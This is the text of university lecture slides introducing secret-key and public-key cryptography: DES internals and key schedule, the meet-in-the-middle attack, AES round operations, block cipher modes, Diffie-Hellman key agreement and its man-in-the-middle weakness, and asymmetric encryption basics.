48 bit
– How to generate Ki ? Ki:48 bit

– Later…

18
CIS 4520
Introduction to
Cryptography
DES

• S-boxes (substitution boxes)

Wenjing Zhang 32 bit

– R: from 48 bits to 32 bits

– Break R into 8 blocks
– 6 bits/block 48 bit Key:48 bit
– Block 1 goes through
box S1
– Block 2 goes through 32 bit

box S2
– Block 3 goes through
box S3
– …
– Block 8 goes through
box S8
19
CIS 4520
Introduction to
Cryptography
DES

• S-boxes (substitution boxes)

Wenjing Zhang 32 bit

– R: from 48 bits to 32 bits

– Break R into 8 blocks
– 6 bits/block 48 bit Ki:48 bit
– S-boxes are different

32 bit

20
CIS 4520
Introduction to
Cryptography
DES

• S-boxes (substitution boxes)

Wenjing Zhang

– Each box defines a substitution

– 6-bit input, 4-bit output
• S-box 1:
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
0 14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7
1 0 15 7 4 14 2 13 1 10 6 12 11 9 5 3 8
2 4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0
3 15 12 8 2 4 9 1 7 5 11 3 14 10 0 6 13

– Look up table: bits 1 and 6 define row, bits 2-5

define column

21
CIS 4520
Introduction to
Cryptography
DES

• S-box 1:
Wenjing Zhang

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
0 14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7
1 0 15 7 4 14 2 13 1 10 6 12 11 9 5 3 8
2 4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0
3 15 12 8 2 4 9 1 7 5 11 3 14 10 0 6 13

– Look up table: bits 1 and 6 define row, bits 2-5

define column
– Input: 010011

22
CIS 4520
Introduction to
Cryptography
DES

• S-box 1:
Wenjing Zhang

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
0 14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7
1 0 15 7 4 14 2 13 1 10 6 12 11 9 5 3 8
2 4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0
3 15 12 8 2 4 9 1 7 5 11 3 14 10 0 6 13

– Look up table: bits 1 and 6 define row, bits 2-5

define column
– Input: 010011
• Bits 1,6 → 01 → row 1
• Bits 2-5 → 1001 → column 9

23
CIS 4520
Introduction to
Cryptography
DES

• S-box 1:
Wenjing Zhang

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
0 14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7
1 0 15 7 4 14 2 13 1 10 6 12 11 9 5 3 8
2 4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0
3 15 12 8 2 4 9 1 7 5 11 3 14 10 0 6 13

– Look up table: bits 1 and 6 define row, bits 2-5

define column
– Input: 010011
• Bits 1,6 → 01 → row 1
• Bits 2-5 → 1001 → column 9
• Output: 6 → 0110

24
CIS 4520
Introduction to
Cryptography
DES

• S-box 1:
Wenjing Zhang

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
0 14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7
1 0 15 7 4 14 2 13 1 10 6 12 11 9 5 3 8
2 4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0
3 15 12 8 2 4 9 1 7 5 11 3 14 10 0 6 13

– Look up table: bits 1 and 6 define row, bits 2-5

define column
– Why use bits 1 and 6 to define row?
– Each row is a substitution from 0-15 to 0-15,
why?

25
CIS 4520
Introduction to
Cryptography
DES

• P-box (permutation box)

Wenjing Zhang 32 bit

– Input: 32 bits
– Bits are rearranged according
to a fixed permutation.
48 bit
– Output: 32 bits Ki:48 bit

– Why P-box?
– Add diffusion 32 bit

– Each S-box's output bits are

spread across different 32 bit

S-boxes in the next round

– Change 1 plain text bit: big
changes to many blocks after
only a few rounds
26
CIS 4520
Introduction to
Cryptography
DES

• P-box (permutation box p)

Wenjing Zhang

S1 S2 S3 S4 S5 S6 S7 S8

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

16 7 20 21 29 12 28 17 1 15 23 26 5 18 31 10 2 8 24 14 32 27 3 9 19 13 30 6 22 11 4 25

Image courtesy of Lawrie Brown, University of Florida

• P-box at end of each round

• Increases diffusion/avalanche effect

27
CIS 4520
Introduction to
Cryptography
DES Round in Full
Wenjing Zhang
Right Half i-1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

32 1 2 3 4 5 4 5 6 7 8 9 8 9 10 11 12 13 12 13 14 15 16 17 16 17 18 19 20 21 20 21 22 23 24 25 24 25 26 27 28 29 28 29 30 31 32 1

Round Key i

+
O 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

input symbol input symbol input symbol input symbol input symbol input symbol input symbol input symbol
control

control

control
S1 S2 S3 S4 S5 S6 S7 S8

output symbol output symbol output symbol output symbol output symbol output symbol output symbol output symbol

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

16 7 20 21 29 12 28 17 1 15 23 26 5 18 31 10 2 8 24 14 32 27 3 9 19 13 30 6 22 11 4 25

Left Half i-1

+
O 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

Right Half i

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

Image courtesy of Lawrie Brown, University of Florida

28
CIS 4520
Introduction to
Cryptography
DES

• Each round:
Wenjing Zhang

The key schedule

29
CIS 4520
Introduction to
Cryptography
DES

• Key Schedule
Wenjing Zhang

– Key is 56 bits (64 – 8

parity)
• Go through a permutation
before round 1
• Then for each round:
– divide into two halves
– circular shift of each half
(shift 1 or 2 bits depending
on round)
• Round 1,2,9,16: shift by 1 bit
• Other rounds: shift by 2 bits

30
– select 48 of the 56 bits
CIS 4520
Introduction to
Cryptography
DES

• Key Schedule
Wenjing Zhang

64-bit key with parity bits

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64

permuted
choice 1
57 49 41 33 25 17 9 1 58 50 42 34 26 18 10 2 59 51 43 35 27 19 11 3 60 52 44 36 63 55 47 39 31 23 15 7 62 54 46 38 30 22 14 6 61 53 45 37 29 21 13 5 28 20 12 4

56-bit key 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56
Left
Shift
2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 1 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 29

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

permuted
choice 2
14 17 11 24 1 5 3 28 15 6 21 10 23 19 12 4 26 8 16 7 27 20 13 2 41 52 31 37 47 55 30 40 51 45 33 48 44 49 39 56 34 53 46 42 50 36 29 32

48-bit subkey 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

Image courtesy of Lawrie Brown, University of Florida

31
CIS 4520
Introduction to
Cryptography
DES
Wenjing Zhang
• The overall process • Design elements
– block size
– key size
– number of
rounds
– subkey
generation
algorithm
– round function
– fast software
en/decryption
– ease of analysis

32
CIS 4520
Introduction to
Cryptography
DES Decryption

• Decrypt must unwind steps of data

Wenjing Zhang

computation
• With Feistel design, do encryption steps
again using subkeys in reverse order
(SK16 … SK1)
– IP undoes final FP step of encryption
– 1st round with SK16 undoes 16th encrypt
round
– ….
– 16th round with SK1 undoes 1st encrypt round
– then final FP undoes initial encryption IP
– thus recovering original data value
33
CIS 4520
Introduction to
Cryptography
Fundamentals of DES
Wenjing Zhang
• Confusion: Utilizes S-boxes for complex key-ciphertext
relationships, ensuring small key changes cause major
ciphertext alterations.
• Diffusion: Employs P-boxes and a Feistel structure to spread
plaintext and key influences, so bit alterations affect much of
the ciphertext.
• Avalanche Effect: Designed to ensure a single input bit
change drastically alters many output bits, enhancing security.
• Reversibility: Features a Feistel network, making encryption
and decryption processes similar, simplifying implementation.
• Efficiency: Optimized for performance in both hardware and
software, considering the computational limits of the era.
• Open Standard: Subjected to thorough public examination,
bolstering trust in its security capabilities.
• Adaptability: Flexible for various applications, contributing to
its broad acceptance and use as a federal standard.
34
CIS 4520
Introduction to
Cryptography
DES

• Strength of DES
Wenjing Zhang

– Key length: 56-bits.

• Brute force attacks!!
– DES Challenge: 56-bit-key-encrypted phrase
decrypted
• July 17, 1998, the Electronic Frontier Foundation
(EFF) DES Cracker, a machine which was built for
less than $250,000 < 3 days
• January 19, 1999, Distributed.Net (w/EFF), 22 hours
and 15 minutes (over many machines)
• Now: with commercially available devices: < 1 day

35
CIS 4520
Introduction to
Cryptography
DES

• Multiple Encryption with DES

Wenjing Zhang

– Double DES
– Encrypt the plaintext twice with two different
DES keys
– Key length increases to 112 bits
– Unfortunately, this is not more secure than
doing DES
– Meet-in-the-middle attack

36
CIS 4520
Introduction to
Cryptography
Meet-in-the-middle attack
Wenjing Zhang

P X
Encryption E E C
Observation:
K1 K2
X’ X=EK1(P)=DK2(C)
Decryption P D D C

• Of course, we don’t know 𝐾1 and 𝐾2

– So we do two parallel exhaustive searches
• For a known pair (𝑃, 𝐶),
– Encrypt 𝑃 with all 256 possible keys
• Store the results in a table sorted by the value of 𝑋
– Decrypt 𝐶 with all 256 possible keys
• For each result 𝑋′, check the table for 𝑋 = 𝑋′
– A match reveals a possible combination of keys < 𝐾1 , 𝐾2 >

37
CIS 4520
Introduction to
Cryptography
DES

• Multiple Encryption with DES

Wenjing Zhang

– Triple DES
– Encrypt the plaintext three times
– With two (or three) different DES keys
– Key length increases to 112 bits (or 168 bits)
– for each block:
• encrypt with key 1
• decrypt with key 2 (this doesn’t really decrypt the
message!)
• encrypt with key 1
• If one key is used, it’s equivalent to doing DES
once.

38
CIS 4520
Introduction to
Cryptography
AES: Advanced Encryption Standard

• DES cracked, replacement needed

Wenjing Zhang

• Triple-DES – slow, has small blocks

• NIST (National Institute of Standards and
Technology) issued call for ciphers in 1997
– private key symmetric block cipher
– 128-bit data, 128/192/256-bit keys
– stronger & faster than Triple-DES
– provide full specification & design details
– Secure for next 50-100 years

39
CIS 4520
Introduction to
Cryptography
Advanced Encryption Standard
Wenjing Zhang
• NIST have released all submissions &
unclassified analyses
– 15 candidates: 1998
– 5 finalists: 1999
– MARS (IBM) - complex, fast, high-security margin
– RC6 (USA) - v. simple, v. fast, low-security margin
– Rijndael (Belgium) - clean, fast, good security margin
– Serpent (Euro) - slow, clean, v. high-security margin
– Twofish (USA) - complex, v. fast, high-security margin

40
CIS 4520
Introduction to
Cryptography
Advanced Encryption Standard

• Winner: Rijndael
Wenjing Zhang

– Vincent Rijmen and Joan Daemen

Rijndael. A variant of Square, the chief

drawback to this cipher is the difficulty
Americans have pronouncing it.
- Bruce Schneier (American cryptographer)

• NIST estimated that a machine that could

break a 56-bit DES key in 1 second would
take 149 trillion years to crack a 128-bit
AES key
41
CIS 4520
Introduction to
Cryptography
AES (Rijndael) Overview
Wenjing Zhang

42
CIS 4520
Introduction to
Cryptography
AES (Rijndael) Overview

• Block size: 128 bits

Wenjing Zhang

• In each round
– SubBytes: non-linear byte substitution
– ShiftRows: circular byte shift in each row
– MixColumns: add diffusion
– AddRoundKey: bitwise XOR

43
CIS 4520
Introduction to
Cryptography
State array
Wenjing Zhang The AES State array is a data structure used in the
encryption and decryption process to hold an
intermediate representation of the data.

Given by 4x4 array of bytes.

Block size: 128 bits = 16 bytes.

44
CIS 4520
Introduction to
Cryptography
AES: SubBytes
SubBytes: table lookup with a 16x16 S-box of bytes
Wenjing Zhang

Change each byte of state with corresponding byte from S-

box matrix: S-box [X,Y]
Non-linear, based on polynomial arithmetic
• used to define and perform operations in Finite Fields, which
provides a mathematical framework for designing security
algorithms and protocols.
45
CIS 4520
Introduction to
Cryptography
AES: SubBytes
SubBytes: table lookup with a 16x16 S-box of bytes
Wenjing Zhang

Example:
S1,1 = 10001011(8b)
S’1,1 = value at row 8 and column b (11) in the S-box

46
CIS 4520
Introduction to
Cryptography
AES: SubBytes
Wenjing Zhang
S-box: lookup table with 16x16 bytes

• Input: 10001011(8b)→ (00111101) (3d)

47 47
CIS 4520
Introduction to
Cryptography
AES: ShiftRows

•
Wenjing Zhang
1st row is unchanged
• 2nd row does 1 byte circular shift to left
• 3rd row does 2 byte circular shift to left
• 4th row does 3 byte circular shift to left

48
CIS 4520
Introduction to
Cryptography
AES: MixColumns

• each column is processed separately based

Wenjing Zhang

on polynomial arithmetic
• each byte is replaced by a value dependent
on all 4 bytes in the column

S’0,0=2S0,0+3S1,0+1S2,0+1S3,0
49
CIS 4520
Introduction to
Cryptography
AES: AddRoundKey

• XOR state with 128-bits of the round key

Wenjing Zhang

• again processed by column (through

effectively a series of byte operations)

state matrix round key matrix

50
CIS 4520
Introduction to
Cryptography
AES: the complete round
Wenjing Zhang

51 51
CIS 4520
Introduction to
Cryptography
AES: the complete round visualization
Wenjing Zhang

52
CIS 4520
Introduction to
Cryptography
S-Box Rationale

• The S-box is constructed by finding the

Wenjing Zhang

multiplicative inverse in a finite field

• Designed to be resistant to known
cryptanalytic attacks
• The Rijndael developers sought a design
that has a low correlation between input
bits and output bits and the property that
the output is not a linear mathematical
function of the input
• The nonlinearity is due to the use of the
multiplicative inverse
53
CIS 4520
Introduction to
Cryptography
Mix Columns Rationale

• Coefficients of a matrix are designed to

Wenjing Zhang

ensure the output (ciphertext) is very

sensitive to changes in the input (plaintext)
to add diffusion

• The mix column transformation combined

with the shift row transformation ensures
that after a few rounds all output bits
depend on all input bits

54
CIS 4520
Introduction to
Cryptography
Summary: Four Stages
Wenjing Zhang One permutation and three substitutions

• Substitute bytes: uses an S-box to perform a byte-

by-byte non-linear substitution of the block

• Shift Rows: a simple permutation

• Mix Columns: a substitution that uses polynomial

arithmetic to combine the four bytes in each
column

• Add Round Key: a simple bitwise XOR of the

current block with a portion of the expanded key

• Each stage is easily reversible—decryption

55 55
CIS 4520
Introduction to
Cryptography
Secret Key Cryptography

• DES
Wenjing Zhang

• AES
– Secure (at least for now)
– Efficient
– Applicable in a wide range of applications

56
CIS 4520
Introduction to
Cryptography
How to encrypt large messages?

• Use block ciphers

Wenjing Zhang

– Divide a large message into blocks

– Pad the last block if it is short
• Use known non-data values and a number to
indicate the padding size or the message size
• How to decide the keys for a sequence of
data blocks
– Use the same key
• A same block in the plaintext results in a same block
in the ciphertext
– Use different keys
• How to generate and securely transmit a large
number of keys?
57
CIS 4520
Introduction to
Cryptography
Modes of Operations

• 4 main modes of operations

Wenjing Zhang

– Electronic Codebook (ECB)

– Cipher Block Chaining (CBC)
– Output Feedback (OFB)
– Cipher Feedback (CFB)
– Counter mode (CTR)
• Consider properties
– Robustness to repetitions in message
– Efficiency
– Error propagation

58
CIS 4520
Introduction to
Cryptography
Electronic Codebook (ECB)
Wenjing Zhang
• Each block is encoded independently using the
same key

M1 M2 M3 M4
64 64 64 40 pad

K ENC K ENC K ENC K ENC

C1
C1 C2
C2 C3
C3 C4
C4

𝐶𝑗 = 𝐄(𝐾, 𝑀𝑗 )

59
CIS 4520
Introduction to
Cryptography
Electronic Codebook (ECB)
Wenjing Zhang
• Each block is encoded independently using the
same key
– Deterministic
• Repeated data blocks in plaintext will reveal a pattern
• E.g., tcp headers, mail headers, etc., long strings of 0's.
– No chaining dependency
• Reordered ciphertext → reordered plaintext
– No error propagation
• Error in 𝐶𝑖 only results in error in the corresponding 𝑃𝑖
– Used in secure transmission of a single value
• Not recommend for encrypting more than 1 data block
with the same key

60
CIS 4520
Introduction to
Cryptography
Cipher Block Chaining (CBC)

• Each block is XOR’ed with the preceding

Wenjing Zhang

ciphertext block
M1 M2 M3 M4
64 64 64 40 pad

K ENC K ENC K ENC K ENC

C1
C1 C2
C2 C3
C3 C4
C4

𝐶1 = 𝐄(𝐾, 𝑀1 ⊕ 𝐼𝑉)
𝐶𝑗 = 𝐄(𝐾, 𝑀𝑗 ⊕ 𝐶𝑗−1 )

61
CIS 4520
Introduction to
Cryptography
Cipher Block Chaining (CBC)

• Each block is XOR’ed with the preceding

Wenjing Zhang

ciphertext block
– Randomized
• Repeated data blocks are encrypted differently
• Secure if IV is random
– Chaining dependent
• Reorder affects decryption
– Error propagates
• Error in 1 ciphertext block propagates to 2 blocks in
decryption, but no further
– Used in secure transmission, authentication

62
CIS 4520
Introduction to
Cryptography
Cipher Feedback (CFB)
• Block encryption
Wenjing Zhang
– b-bit IV; use the same key to get b-bit output
• Leftmost 𝑠 bits of the output
– Is XORed with a s-bit message segment
– Is fed back to the shift register
• Shift register
– Shifts left 𝑠 bits; fills the rightmost bits with 𝑠-bit ciphertext

63
CIS 4520
Introduction to
Cryptography
CFB Properties

• Randomized
Wenjing Zhang

– Repeated data blocks are XORed with

different bitstrings
– Secure if IV is random
• Chaining dependent
– Reorder affects decryption
• Error propagates
– Error in 1 ciphertext block propagates to
several blocks in decryption
• Generally used in stream-oriented
transmission, authentication

64
CIS 4520
Introduction to
Cryptography
Cipher Feedback (CFB)

• Covert DES into a stream cipher

Wenjing Zhang

– No need to pad the message: ciphertext is of

the same length as the plaintext
– Can operate in real-time
– Output of the block encryption is used as
subkeys of the stream cipher
– Preceding ciphertext segment forms part of the
input of the block encryption
– A same key is used in the block encryption

65
CIS 4520
Introduction to
Cryptography
Output Feedback (OFB)
Wenjing Zhang
• Leftmost 𝑠 bits of the encryption output is fed
back to the shift register

66
CIS 4520
Introduction to
Cryptography
OFB Properties
Wenjing Zhang
• Randomized
– Repeated data blocks encrypted with different
keys
– Secure if IV is random
• Chaining independent
– Reorder does not affect decryption
– Key stream is plaintext-independent: allow
pre-computing of pseudo-random stream
• No error propagation
– Preceding ciphertext is not involved in later
encryption
• Used in stream-oriented transmission over
noisy channel (satellite communication)
67
CIS 4520
Introduction to
Cryptography
Encryption Modes for Real-world Applications
Wenjing Zhang
• ECB (Electronic Codebook)
– Used for small, unique data sets where pattern recognition is not a
concern.
– Examples: Encrypting keys in a Digital Rights Management system,
encrypting individual items without patterns (e.g., single-use tokens).
• CBC (Cipher Block Chaining)
– Common in secure file transfer and disk encryption.
– Examples: HTTPS communications, VPN data transfer, full disk
encryption in laptops and external drives.
• CFB (Cipher Feedback)
– self-synchronizing stream cipher.
– Examples: Voice over IP (VoIP) calls, encrypted messaging apps,
real-time video conferencing encryption.
• OFB (Output Feedback)
– Suitable for streaming data where error propagation must be avoided.
– Examples: Live video streaming, satellite data transmission, secure
radio communication.

68
CIS 4520
Introduction to
Cryptography
Counter Mode (CTR)

• Use a counter equal to the plaintext block

Wenjing Zhang

size to construct key streams

– No chaining, pre-computing the key, very
efficient
– Used to encrypt high-speed data, or to generate
random bitstreams (e.g., PRNG)

69
CIS 4520
Introduction to
Cryptography
Reading Assignment for Next Class
Wenjing Zhang

• Chapter 9 Public-Key Cryptography and RSA,

Section 9.1 - 9.2 of Cryptography and Network
Security: Principles and Practice. 2017. (7th Ed.)
William Stallings. Pearson Education.

• Chapter 10 Other Public-Key Cryptosystems,

Section 10.1 of Cryptography and Network
Security: Principles and Practice. 2017. (7th Ed.)
William Stallings. Pearson Education.
CIS 4520
Introduction to
Cryptography
Secret Key Cryptography

• Two difficult problems associated with the

Wenjing Zhang

secret-key cryptosystem:

• How to provide non-repudiation?

– Need to uniquely identify an entity

71
CIS 4520
Introduction to
Cryptography
Secret Key Cryptography

• Two difficult problems associated with the

Wenjing Zhang

secret-key cryptosystem:

• How to securely distribute secret keys?

– Which key to use? How to obtain the key
securely?
– Pre-load keys are used in many applications,
e.g., at sensor nodes
– However, risk exists if keys are stolen
– We need to pre-load many keys…

72
CIS 4520
Introduction to
Cryptography
Secret Key Cryptography

• How many keys do we need?

Wenjing Zhang

• For n people

73
CIS 4520
Introduction to
Cryptography
Secret Key Cryptography

• How many keys do we need?

Wenjing Zhang

• For n people
– 2 people: 1 key

74
CIS 4520
Introduction to
Cryptography
Secret Key Cryptography

• How many keys do we need?

Wenjing Zhang

• For n people
– 2 people: 1 key
– 3 people: 3 keys

75
CIS 4520
Introduction to
Cryptography
Secret Key Cryptography

• How many keys do we need?

Wenjing Zhang

• For n people
– 2 people: 1 key
– 3 people: 3 keys
– 4 people: 6 keys

76
CIS 4520
Introduction to
Cryptography
Secret Key Cryptography

• How many keys do we need?

Wenjing Zhang

• For n people
– 2 people: 1 key
– 3 people: 3 keys
– 4 people: 6 keys
– 5 people: 10 keys

77
CIS 4520
Introduction to
Cryptography
Secret Key Cryptography

• How many keys do we need?

Wenjing Zhang

• For n people
– n people: n(n-1)/2 keys
• O(n2)
• We don’t like anything more than O(n)…
– Can we ask all n people to share the same key?
– Do we have a better way to generate and
distribute keys?

78
CIS 4520
Introduction to
Cryptography
Key Distribution/Agreement

• Key Distribution
Wenjing Zhang

– The process to assign and transfer keys to a

participant
• Key Agreement
– The process whereby two (or more) parties
negotiate a key
– As part of communication: SKIP (Simple Key-
Management for Internet Protocol)
• Typically, key distribution/agreement
occurs in conjunction with or after
authentications.

79
CIS 4520
Introduction to
Cryptography
Diffie-Hellman Key Agreement

• Diffie and Hellman: important

Wenjing Zhang

breakthrough in 1976,
– Started the modern age of cryptography
– To establish a shared secret number between
two parties using a public communication
channel.

• Mathematics are very deep

– Working in multiplicative group
– Use the hardness of computing discrete
logarithms in finite field to guarantee security.

80
CIS 4520
Introduction to
Cryptography
Intuition: Exchange of Colors
Wenjing Zhang

Source:
Wikipedia

81
CIS 4520
Introduction to
Cryptography
Diffie-Hellman Key Exchange
Wenjing Zhang

82
CIS 4520
Introduction to
Cryptography
Diffie-Hellman Protocol: Example
Wenjing Zhang

Source:
Wikipedia
83
CIS 4520
Introduction to
Cryptography
Why Diffie-Hellman is Secure?

• The security of Diffie-Hellman relies on

Wenjing Zhang

the discrete logarithm problem being hard

to solve.

• Given a prime p, a generator g, and the

result of g raised to a secret exponent (i.e.,
A= ga mod p), it is computationally
infeasible to determine the secret exponent
a given A, g, and p.

84
CIS 4520
Introduction to
Cryptography
Attacks on Diffie-Hellman

• This is a key agreement, not authentication

Wenjing Zhang

– You don’t know anything about who you have

exchanged keys with
– Insecure against active attacks, e.g., man-in-
the-middle
• Alice and Bob think they are talking directly to each
other
• Mallory is actually performing two separate
exchanges

85
CIS 4520
Introduction to
Cryptography
Man-in-the-Middle Attack
Wenjing Zhang

• Frank intercepts and may alter messages between Alice and Bob.
• Attack compromises confidentiality and integrity of Alice and
Bob's communication.
• Additional security measures required for authentication.
86
CIS 4520
Introduction to
Cryptography
Reading Assignment for Next Class
Wenjing Zhang

• Chapter 9 Public-Key Cryptography and RSA,

Section 9.1 - 9.2 of Cryptography and Network
Security: Principles and Practice. 2017. (7th Ed.)
William Stallings. Pearson Education.

• Chapter 10 Other Public-Key Cryptosystems,

Section 10.1 of Cryptography and Network
Security: Principles and Practice. 2017. (7th Ed.)
William Stallings. Pearson Education.
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

Elementary Cryptography

Public Key Cryptography

CIS 4520
Introduction to
Cryptography
Asymmetric Encryption
Wenjing Zhang
• Public Key Cryptography
– a.k.a. asymmetric encryption
– Encryption and decryption with different keys
– Bob has a pair of public and private keys
– Bob's public key is known by Alice
• Alice uses Bob’s public key to encrypt the message
C = E(Kpub, P)
P = D(Kpri, C) = D(Kpri, E(Kpub, P))

Kpub K
pri

plaintext encryption ciphertext decryption plaintext

message, m algorithm E(Kpub,m) algorithm D(Kpri,E(Kpub,m))

89
CIS 4520
Introduction to
Cryptography
Asymmetric Encryption
Wenjing Zhang
• Public Key Cryptography
– Public key: anyone can know
– Private key: only known to the owner
• The keys are inverses of each other:
– Anything encrypted with your public key can only be
decrypted with your private key; it cannot be decrypted
by your public key!
– Anything encrypted with your private key can only be
decrypted with your public key; it cannot be decrypted
with your private key!!

Kpub K
pri

plaintext encryption ciphertext decryption plaintext

message, m algorithm E(Kpub,m) algorithm D(Kpri,E(Kpub,m))

90
CIS 4520
Introduction to
Cryptography
Asymmetric Encryption

• What can we do with it?

Wenjing Zhang

– Encryption: keep your data secret

– Authentication: prove you are who you say
you are (confirms a user's identity)
– Integrity: the message has not been changed

91
CIS 4520
Introduction to
Cryptography
Asymmetric Encryption

• Encryption: keep your data secret

Wenjing Zhang

• Alice wants to send a message to Bob

– Only Bob should be able to read it
– Alice encrypts the message with Bob’s public
key.
– Bob decrypts the ciphertext with his private
key.

K B_pub K
B_pri

plaintext encryption ciphertext decryption plaintext

message, m algorithm E(KB_pub,m) algorithm D(KB_pri,E(KB_pub,m))

92
CIS 4520
Introduction to
Cryptography
Asymmetric Encryption
Wenjing Zhang
• Authentication: prove you are who you say you
are (a process that confirms a user's identity)
• Digital signatures
– Should work like handwritten signatures: verify the
sender of the document
– Alice sends a message to Bob
– How can Alice prove that she is the real sender?
– Alice sends the message encrypted with her private key
– Bob decrypts with Alice’s public key.
K A_pri K
A_pub

plaintext encryption ciphertext decryption plaintext

message, m algorithm E(KA_pri,m) algorithm

93
CIS 4520
Introduction to
Cryptography
Asymmetric Encryption
Wenjing Zhang
• Authentication: prove you are who you say you
are (a process that confirms a user's identity)
• Digital signatures
– Could also send two copies:
– One clear
– One encrypted with Alice’s private key
– Why?

K A_pri K
A_pub